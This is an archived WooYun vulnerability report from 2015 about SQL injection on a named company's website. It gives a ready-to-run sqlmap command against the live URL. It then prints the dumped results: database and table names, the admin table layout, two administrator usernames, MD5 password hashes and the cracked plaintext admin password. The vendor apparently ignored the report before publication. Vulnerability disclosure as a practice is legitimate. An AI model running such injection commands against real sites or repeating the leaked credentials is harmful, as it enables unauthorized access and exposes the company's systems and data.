当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0139554

漏洞标题:三人行传媒网络科技股份有限公司/管理员账号密码已爆

相关厂商:三人行传媒网络科技股份有限公司

漏洞作者: 冷白开。

提交时间:2015-09-07 17:36

修复时间:2015-10-22 17:38

公开时间:2015-10-22 17:38

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

三人行传媒网络科技股份有限公司/管理员账号密码已爆

详细说明:

注射sqlmap.py -u "http://www.topsrx.com/index.php?m=default&c=page&a=detail&name=Company%20Profile" --dbs

1.png

脱出数据证明危害存在

available databases [12]:
[*] db_hellouniversity
[*] db_topsrx
[*] information_schema
[*] manage
[*] mysql
[*] openfire
[*] smartcollege
[*] smartcollege_gsh
[*] smartcollege_qz
[*] test
[*] vote
[*] webmanage
Database: db_topsrx
[13 tables]
+---------------+
| srx_admin |
| srx_category |
| srx_file |
| srx_guestbook |
| srx_job |
| srx_link |
| srx_mod |
| srx_nav |
| srx_news |
| srx_page |
| srx_product |
| srx_setting |
| srx_show |
+---------------+
Database: db_topsrx
Table: srx_admin
[7 columns]
+---------------+------------------+
| Column | Type |
+---------------+------------------+
| id | int(3) unsigned |
| ipaddress | varchar(30) |
| lastlogintime | int(10) unsigned |
| logincount | int(6) unsigned |
| password | varchar(32) |
| roleid | int(1) unsigned |
| username | varchar(50) |
+---------------+------------------+
Database: db_topsrx
Table: srx_admin
[2 entries]
+----------+
| username |
+----------+
| admin |
| yuxang |
+----------+
Database: db_topsrx
Table: srx_admin
[2 entries]
+----------------------------------+
| password |
+----------------------------------+
| 36df336a9a11768d3a835c99a0c84d49 |明文:661699
| e2c4496d6bcec25cca46e129b506f468 |
+----------------------------------+

admin密码是661699~~老夫居然没找到后台。。。。

漏洞证明:

综上

修复方案:

你们懂

版权声明:转载请注明来源 冷白开。@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论